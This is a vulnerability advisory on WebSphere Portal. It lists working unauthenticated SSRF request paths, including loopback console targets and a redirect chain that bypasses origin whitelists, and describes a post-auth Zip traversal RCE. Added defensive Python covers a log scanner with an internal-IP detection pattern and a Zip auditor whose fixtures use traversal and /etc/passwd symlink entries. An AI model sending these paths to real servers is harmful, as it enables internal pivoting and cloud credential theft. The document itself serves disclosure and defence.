Advisory: Websphere Portal SSRFs & Post Auth RCE

Dec 25, 2021

Summary

Websphere Portal 9 and potentially newer releases are vulnerable to server-side request forgery, which allows attackers to request arbitrary URLs and read the full HTTP response for these requests.

Numerous SSRF vulnerabilities exist in Websphere Portal that can be exploited without any authentication.

Additionally, Websphere Portal is vulnerable to post-authentication command execution through the upload of a Zip file whose extraction is vulnerable to directory traversal.

Impact

An attacker can request arbitrary URLs on behalf of the Websphere Portal server. This could allow an attacker to pivot to the internal network and/or request cloud metadata endpoints to obtain cloud credentials. Users with post-authentication access can achieve RCE by uploading a malicious Zip file.

Affected Software

Websphere Portal 9 and potentially newer releases

Product Description

WebSphere Portal is enterprise software used to build and manage web portals. It provides access to web content and applications, while delivering personalized experiences for users. The WebSphere Portal package is a component of WebSphere application software.

Solution

We suggest that you modify all of the proxy-config.xml files in your Websphere Portal installation so that no origins are whitelisted.

Additionally, if the functionality is not necessary for your installation of Websphere Portal, remove the following folders:

PortalServer/base/wp.proxy.config/installableApps/wp.proxy.config.ear
WebSphere/wp_profile/installedApps/dockerCell/Quickr_Document_Picker.ear
WebSphere/wp_profile/config/cells/dockerCell/applications/PA_WCM_Authoring_UI.ear

Do not rely on WAF rules to prevent exploitation of this issue. There are a number of ways to reach these endpoints that WAF rules may not sufficiently cover.

Vulnerabilities

SSRFs:

GET full read SSRF:

/docpicker/internal_proxy/https/example.com
/docpicker/internal_proxy/http/example.com
/docpicker/internal_proxy/https/127.0.0.1:9043/ibm/console
/docpicker/internal_proxy/http/127.0.0.1:9100/aa

Redirect chain - turning a "bad" SSRF (limited to whitelisted origins) into a "good" SSRF (arbitrary target) by following a redirect from an allowed host:

/docpicker/common_proxy/http/www.redbooks.ibm.com/Redbooks.nsf/RedbookAbstracts/sg247798.html?Logout&RedirectTo=http://example.com
/wps/proxy/http/www.redbooks.ibm.com/Redbooks.nsf/RedbookAbstracts/sg247798.html?Logout&RedirectTo=http://example.com
/wps/myproxy/http/www.redbooks.ibm.com/Redbooks.nsf/RedbookAbstracts/sg247798.html?Logout&RedirectTo=http://example.com
/wps/common_proxy/http/www.redbooks.ibm.com/Redbooks.nsf/RedbookAbstracts/sg247798.html?Logout&RedirectTo=http://example.com
/wps/cmis_proxy/http/www.redbooks.ibm.com/Redbooks.nsf/RedbookAbstracts/sg247798.html?Logout&RedirectTo=http://example.com
/wps/contenthandler/!ut/p/digest!8skKFbWr_TwcZcvoc9Dn3g/?uri=http://www.redbooks.ibm.com/Redbooks.nsf/RedbookAbstracts/sg247798.html?Logout&RedirectTo=http://example.com

Arbitrary HTTP method + body:

/wps/PA_WCM_Authoring_UI/proxy/http/example.com
/wps/PA_WCM_Authoring_UI/proxy/https/example.com
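The Solution section above warns that WAF rules alone will not cover every way of reaching these proxy endpoints; the same endpoint list is still useful for retrospective detection in web server access logs, where the proxied target of each request is visible. The Python script below is an added example written for this page, not Assetnote's code or any IBM/HCL tooling: it parses constructed combined-format access-log lines, normalizes the request path (percent-decoding twice, collapsing repeated slashes, case-insensitive prefix match) so that encoding variants still match, extracts the proxied target for each endpoint family listed above (including the uri= parameter of the contenthandler endpoint and the RedirectTo= parameter used in the redirect chain), and flags targets on loopback, private or link-local addresses. The log line format, the client addresses and the sensitive-host ranges are assumptions.

```python
"""Flag WebSphere Portal proxy-endpoint requests in access logs (added example)."""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Proxy endpoint prefixes taken from the advisory. Context paths can differ per
# installation, so treat this list as a starting point rather than a complete one.
PROXY_PREFIXES = (
    "/docpicker/internal_proxy/",
    "/docpicker/common_proxy/",
    "/wps/proxy/",
    "/wps/myproxy/",
    "/wps/common_proxy/",
    "/wps/cmis_proxy/",
    "/wps/PA_WCM_Authoring_UI/proxy/",
)
CONTENTHANDLER_PREFIX = "/wps/contenthandler/"

# Destinations an outbound request from the portal should never be proxied to:
# loopback, RFC 1918 ranges and link-local (where cloud metadata services live).
# Assumed ranges; extend with your own internal address space.
SENSITIVE_HOST_RE = re.compile(
    r"^(?:localhost|127\.\d+\.\d+\.\d+|10\.\d+\.\d+\.\d+|192\.168\.\d+\.\d+"
    r"|172\.(?:1[6-9]|2\d|3[01])\.\d+\.\d+|169\.254\.\d+\.\d+)$"
)
REDIRECT_RE = re.compile(r"(?i)RedirectTo=(https?://[^&\s\"]+)")
# Apache/IHS "combined"-style line (assumed format; the sample lines are constructed).
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')


def normalize(path):
    """Percent-decode up to twice (defeats double encoding) and collapse '//' runs
    in the path part only, so the query (which may carry URLs) is left intact."""
    for _ in range(2):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    path, sep, query = path.partition("?")
    return re.sub(r"/{2,}", "/", path) + sep + query


def classify_request(path):
    """Return a finding dict if the path hits a proxy endpoint, else None."""
    path = normalize(path)
    lower = path.lower()
    for prefix in PROXY_PREFIXES:
        if lower.startswith(prefix.lower()):
            # Layout is <prefix><scheme>/<host[:port]/rest...>
            scheme, _, rest = path[len(prefix):].partition("/")
            return _finding(prefix, f"{scheme}://{rest}", path)
    if lower.startswith(CONTENTHANDLER_PREFIX.lower()):
        uri = parse_qs(urlsplit(path).query).get("uri")
        if uri:
            return _finding(CONTENTHANDLER_PREFIX, uri[0], path)
    return None


def _finding(endpoint, target, full_path):
    host = (urlsplit(target).hostname or "").lower()
    finding = {
        "endpoint": endpoint,
        "target_host": host,
        "sensitive_target": bool(SENSITIVE_HOST_RE.match(host)),
        "redirect_host": None,
        "redirect_sensitive": False,
    }
    # The redirect chain: an allowed host that is asked to redirect elsewhere.
    m = REDIRECT_RE.search(full_path)
    if m:
        rhost = (urlsplit(m.group(1)).hostname or "").lower()
        finding["redirect_host"] = rhost
        finding["redirect_sensitive"] = bool(SENSITIVE_HOST_RE.match(rhost))
    return finding


def scan_log(lines):
    """Return one finding per proxy-endpoint request, annotated with client/method/status."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        client, method, path, status = m.groups()
        finding = classify_request(path)
        if finding:
            finding.update(client=client, method=method, status=int(status))
            hits.append(finding)
    return hits


# Constructed sample log lines; paths mirror the advisory's endpoint list.
SAMPLE_LOG = [
    '203.0.113.7 - - [25/Dec/2021:10:00:01 +0000] "GET /docpicker/internal_proxy/https/127.0.0.1:9043/ibm/console HTTP/1.1" 200 5120',
    '203.0.113.7 - - [25/Dec/2021:10:00:02 +0000] "GET /wps/proxy/http/www.redbooks.ibm.com/Redbooks.nsf/RedbookAbstracts/sg247798.html?Logout&RedirectTo=http://example.com HTTP/1.1" 200 311',
    '203.0.113.7 - - [25/Dec/2021:10:00:03 +0000] "POST /wps/PA_WCM_Authoring_UI/proxy/http/example.com HTTP/1.1" 200 88',
    '203.0.113.7 - - [25/Dec/2021:10:00:04 +0000] "GET /wps//contenthandler/!ut/p/digest!8skKFbWr_TwcZcvoc9Dn3g/?uri=http%3A%2F%2Fwww.redbooks.ibm.com%2FRedbooks.nsf%2FRedbookAbstracts%2Fsg247798.html%3FLogout%26RedirectTo%3Dhttp%3A%2F%2Fexample.com HTTP/1.1" 200 311',
    '198.51.100.4 - - [25/Dec/2021:10:00:05 +0000] "GET /wps/portal HTTP/1.1" 200 10240',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

Alert on any hit whose target or redirect host is flagged sensitive, and review the remaining hits by volume and client: after applying the advisory's fix (no whitelisted origins in proxy-config.xml), every request to these endpoints should fail, so any 200 response is itself a signal.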

Post authentication RCE details can be found here
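The post-authentication issue described above comes down to a Zip extraction that honours directory-traversal entry names. The check below is an added example, written in Python for illustration rather than the portal's own code: it audits an uploaded archive before anything is written to disk, refusing entries that would resolve outside the extraction directory (via '..' segments or absolute names) and entries stored as symbolic links, which an extractor would otherwise recreate inside the directory pointing elsewhere. The extraction root, the archive fixtures and their entry names are constructed for the example.

```python
"""Audit uploaded Zip archives for path traversal before extraction (added example)."""
import io
import stat
import tempfile
import zipfile
from pathlib import Path

# Constructed extraction root; an application would use its own upload directory.
DEST = Path(tempfile.gettempdir()) / "portal-upload-extract"


def audit_archive(data, dest=DEST):
    """Return the names of entries that must not be extracted under dest:
    absolute paths, '..' traversal that resolves outside dest, and symlinks."""
    dest = Path(dest).resolve()
    bad = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            name = info.filename.replace("\\", "/")  # archive may be built on Windows
            # Joining an absolute name replaces dest entirely, so resolve() exposes
            # both absolute names and '..' escapes with the same parents check.
            target = (dest / name).resolve()
            escapes = dest not in target.parents
            # Unix mode bits live in the high 16 bits of external_attr.
            is_link = stat.S_ISLNK(info.external_attr >> 16)
            if escapes or is_link:
                bad.append(info.filename)
    return bad


def safe_extract(data, dest=DEST):
    """Refuse the whole archive if any entry is unsafe; extract it otherwise.
    Auditing everything first avoids leaving a half-written upload on rejection."""
    bad = audit_archive(data, dest)
    if bad:
        raise ValueError(f"refusing archive, unsafe entries: {bad}")
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        zf.extractall(dest)
        return zf.namelist()


def build_zip(entries):
    """Construct an in-memory archive from (name, content, is_symlink) tuples (test data)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, content, is_symlink in entries:
            info = zipfile.ZipInfo(name)  # ZipInfo keeps '..' and leading '/' as given
            if is_symlink:
                info.external_attr = (stat.S_IFLNK | 0o777) << 16
            zf.writestr(info, content)
    return buf.getvalue()


# Constructed fixtures: one clean theme upload and three kinds of unsafe entry.
CLEAN_ZIP = build_zip([("theme/index.html", b"<html></html>", False),
                       ("theme/css/app.css", b"body{}", False)])
TRAVERSAL_ZIP = build_zip([("theme/index.html", b"<html></html>", False),
                           ("../../../tmp/evil.txt", b"x", False)])
ABSOLUTE_ZIP = build_zip([("/tmp/evil.txt", b"x", False)])
SYMLINK_ZIP = build_zip([("theme/link", b"/etc/passwd", True)])

if __name__ == "__main__":
    for label, blob in [("clean", CLEAN_ZIP), ("traversal", TRAVERSAL_ZIP),
                        ("absolute", ABSOLUTE_ZIP), ("symlink", SYMLINK_ZIP)]:
        print(label, "unsafe entries:", audit_archive(blob))
```

Python's own ZipFile.extractall strips traversal components, so in this language the audit mainly models what an extractor without that protection must do; the design point that carries over to any runtime is to validate every entry against the resolved extraction root before writing the first file, and to reject the archive as a whole rather than skip individual entries.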

Blog Post

The blog post detailing the steps taken for the discovery of this vulnerability can be found here.

Credits

Assetnote Security Research Team

Timeline

The timeline for this disclosure process can be found below:

  • Sept 5th, 2021: Disclosure of SSRFs and Post Auth RCE (6 reports)
  • Sept 7th, 2021: Initial response from HCL Technologies stating that the reports have been submitted to product teams
  • Oct 5th, 2021: Sent a reminder that 30 days have elapsed and 60 days remain as per our responsible disclosure policy
  • Oct 5th, 2021: Response stating that they will follow up with the team analyzing the vulnerabilities
  • Nov 8th, 2021: Sent a reminder that 60 days have elapsed and 30 days remain as per our responsible disclosure policy
  • Nov 8th, 2021: Response stating that they could not reproduce any of our findings, reminding us that we cannot claim CVEs for any of these issues as they are a CNA
  • Nov 8th, 2021: Sent a request for CVEs to HCL Technologies for the issues identified - received no response
  • Nov 20th, 2021: Sent another request for CVEs to HCL Technologies and reminded them that we will be publishing after the 90-day deadline (Dec 5th)
  • Nov 23rd, 2021: Response stating that CVEs won't be filed until remediation steps are available
  • Nov 23rd, 2021: Sent a reminder that we will be publishing after the 90-day deadline, without CVEs available
  • Nov 23rd, 2021: Response stating that if we publish any information about these vulnerabilities, HCL Technologies will cite us as an irresponsible vulnerability disclosure party to the communities that we post to
  • Nov 23rd, 2021: Sent a reminder that we are following our 90-day disclosure policy as stated upon initial report
  • Dec 3rd, 2021: Sent a reminder that the 90-day deadline ends on Dec 5th

No response since Nov 23rd.